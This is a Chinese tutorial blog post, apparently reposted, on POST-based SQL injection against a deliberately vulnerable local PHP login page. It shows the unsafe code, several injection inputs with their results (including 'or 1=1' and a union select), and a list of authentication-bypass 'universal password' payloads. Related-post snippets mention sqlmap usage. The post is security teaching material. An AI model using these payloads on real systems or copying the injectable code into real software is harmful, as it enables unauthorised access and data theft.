sql_injection之post注入

最新推荐文章于 2023-02-28 09:44:03 发布
最新推荐文章于 2023-02-28 09:44:03 发布
阅读量268 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/BloodZero/p/4425105.html
版权

1、代码篇

</html>
<center>
<form action="#" method="post">
姓名:<input type="text" name="user"><br>
密码:<input type="text" name="pass"><br>
<input type="submit" name="submit" value="提交">
</center>
</html>
<?php
/*************************
author:Bloodero
sql_injection_post
*************************/

include("../conn.php");
error_reporting(0);
if(isset($_POST['submit'])){
    if(!empty($_POST['user']) && !empty($_POST['pass'])){
        $user=$_POST['user'];
        $pass=$_POST['pass'];
        echo "你当前输入用户名:".$user."<br>";
        echo "你当前输入密码:".$pass."<br>";
        $sql="select * from user where username='$user' and password='$pass'";
        $res=mysql_query($sql);
        $row=mysql_fetch_array($res);
        if(empty($row)){
            echo "<script>alert('登陆失败')</script>";
        }
        else{
            echo "当前用户:<br>";
            echo "id:".$row['id']."<br>";
            echo "username:".$row['username']."<br>";
            echo "password:".$row['password']."<br>";
        }
    }
    else{
        echo "<script>alert('用户名/密码不能为空')</script>";
    }
}
else{
    exit();
}
?>

2、注入篇:http://localhost/pentest/sql/sql_injection_post.php

正确输入:

你当前输入用户名:admin
你当前输入密码:pass
当前用户:
id:1
username:admin
password:pass

尝试注入:

你当前输入用户名:1'
你当前输入密码:1

登陆失败
你当前输入用户名:1' #
你当前输入密码:1

登陆失败
你当前输入用户名:1' or 1=1#
你当前输入密码:1
当前用户:
id:1
username:admin
password:pass

登陆成功
你当前输入用户名:1' or 1=2#
你当前输入密码:1

登陆失败

这里我解释一下原理:

当我们闭合了where语句,然后再后面接or 1=2时,这时候恒假,所以不会有结果;

当我们接or 1=1时,恒真,所以就会查询所有;

你当前输入用户名:1' and 1=2 union select * from user#
你当前输入密码:1
当前用户:
id:1
username:admin
password:pass

这里的原理不懂的可以去看看第一发sql_injection;

3、防注入

对post过来的数据,进行处理;会有一篇进行详细讲解

4、通过post注入,引生的万能密码

"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
admin' or 'a'='a 密码随便
'or 1=1/*
User: something  Pass: ' or '1'='1
1'or'1'='1
admin' or 1=1/*

 

转载于:https://www.cnblogs.com/BloodZero/p/4425105.html

aipei5098
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入---数值型注入POST
Ethan024的博客
03-22 501
SQL注入—数值型注入POST)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值型注入POST) 实验步骤: 先查询一下下拉框的功能: 查看此时的URL:http://localhost/pikaqiu.cn/vul/sqli/sqli_id.php发现是post方式提交的请求,因为没有使用URL传参。 后端数据库查询逻辑:select name, email from table where id = n(1,2,3,4…) 使用Burpsuite
sql注入 pikachu post数字型注入
08-12
SQL 注入SQL Injection)是一种代码注入技术,攻击者可以通过在输入字段中注入恶意的 SQL 语句来攻击Web应用程序。这种攻击可以导致敏感数据的泄露、修改或删除。 Pikachu Post 数字型注入 Pikachu Post 数字型...
SQL injection_POST injection
qq_46635165的博客
09-24 228
实验环境 : sqli-labs_Less-9 POST注入 : 常出现在一些以post方式提交数据的页面,比如账号密码输入框,post注入是通过post传参作为注入点,来实现查询数据库,得到我们想要的信息; 实例: 打开解题网址,一个输入框: 常规测试单引号,出现语法错误提示,到这里,通过burpsuite来实现post注入更加方便: 1,抓包: 闭合语句,然后进行一个单引号注入即可: over! ...
SQL Injection (POST/Select)
qq_40554015的博客
09-17 255
这道题显然还是用burpsuit抓包来看看: movie=2 和上一题不同,这里是数字,猜测换成其他数字就是其他电影,那么怎么换呢? burpsuit抓包后右键发送到Repeater,修改数据再发送就可以了! 修改为3,果然变成了Man of Steel 那就直接在左边修改数据post就可以了 先来看看可显示位: 和前几题真是一模一样! 再来看看库名: 接下来是表名: 然后是字段名: 最后看一看login和pass...
(学习)SQL注入-POST注入
热门推荐
Huang921的博客
11-21 1万+
SQL注入-POST注入实践
sql注入post参数注入
Vinson的博客
09-29 4518
request.raw抓取的数据包头,最高水平最高风险,用Mysql的数据库dbms,不再询问--batch 用Burpsuite抓取,复制包头,gedit request.raw复制进去 sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch sqlmap -r request.raw --level ...
自己动手编写SQL注入漏洞扫描工具
11-08
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入的情况。在这个主题中,我们将深入探讨如何自己动手编写一个SQL注入漏洞扫描工具。首先,我们要理解SQL注入的工作原理和其潜在的危害。 ...
Validation-for-SQL-Injection:验证SQL注入
03-26
路径- /api/v1/sanitized/input/类型POST 有效输入 样本输入 curl -X POST https://iu8utrspej.execute-api.us-west-2.amazonaws.com/production/api/v1/sanitized/input/ \ --header "Content-Type: application...
Structured-query-Language-injection:SQL注入自动工具
06-15
Structured-query-Language-injection SQL注入自动工具: 多用途 MySQL 注入工具功能 *联合注入 *盲注 *post 和 get 方法注入 ** POST 不工作 *full information_schema enumeration *table and column fuzzer *...
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
Kali自动化SQL注入神器————JSQL
Fly_鹏程万里
06-07 8089
JSQL简介jSQL injection是一款由JAVA开法的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能,是一款非常不错的工具,也是渗透测试人员的强大助手。它支持GET\POST注入,同时也可以进行HTTP头注入(这个需要用户自动构建)主界面对于JSQL,用户可以通过在终端中直接输入jsq...
入侵检测——jsql
LainWith的博客
07-02 2318
jSQL injection是一款由JAVA开法的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能,是一款非常不错的工具,也是渗透测试人员的强大助手。它支持GET\POST注入,同时也可以进行HTTP头注入(这个需要用户自动构建),它是免费的,开源的,跨平台的Windows,Linux和Mac,它适用于版本11到17的Java工具的安装与应用范围,参见github地址:https://github.com
SQL注入自动测试工具—jSQL
Criss@陈磊
03-22 1682
Version 0.2 特性 GET, POST, header, cookie 注入方法支持 普通,报错,盲注,时间注入支持 自动选择最佳算法 线程控制(start/pause/resume/stop) 暴露URL请求 简单的绕过功能 进度条 代理设置 支持MYSQL 下一版本:https://code.google.com/p/jsq
SQL注入——SQL Injection
djh1179的博客
09-27 269
本文部分内容转自:https://www.cnblogs.com/rush/archive/2011/12/31/2309203.html http://www.diybl.com/course/7_databases/sql/msshl/2007616/59684_2.html 目录: 一、什么是s...
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2761
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 806
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
自动化SQL注入工具——jSQL Injection v0.4
weixin_34240657的博客
11-04 1225
jSQL是一款轻量级的安全测试工具,用于发现远程数据库的漏洞信息。jSQL免费、开源、跨平台(Windows, Linux, Mac OS X, Solaris)。Version 0.4特性GET,POST,header,cookiemethods Normal,errorbased,blind,timebasedalgorithms Automatic...
sql注入练习记录
weixin_46158939的博客
12-04 357
sql注入入门练习;bwapp,dvwa
webgote的例子(3)Sql注入(SearchPOST)
时光凉春衫薄的博客
03-25 494
Sql注入(Search/POST) (本章内容):post的方式进行注入 今天来讲一下sql注入的另一个例子(post) 上一个用的是get请求的方法将我们的参数传到服务器进行执行   上图中的标红是需要注意的地方。我们查询的参数都是可以通过url进行传递的title=什么就代表我们查什么。   然而post这个例子中设计者改变了这种方法选择了另外的提交方式。这时候我们在url中注入...
SQL InjectionSQL注入
最新发布
06-24
SQL注入SQL Injection)是一种常见的网络安全漏洞,发生在应用程序与数据库交互时,恶意用户能够通过输入恶意构造的SQL语句,意图干扰或获取数据库系统中的数据。攻击者通常利用这种漏洞来执行未经授权的操作,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值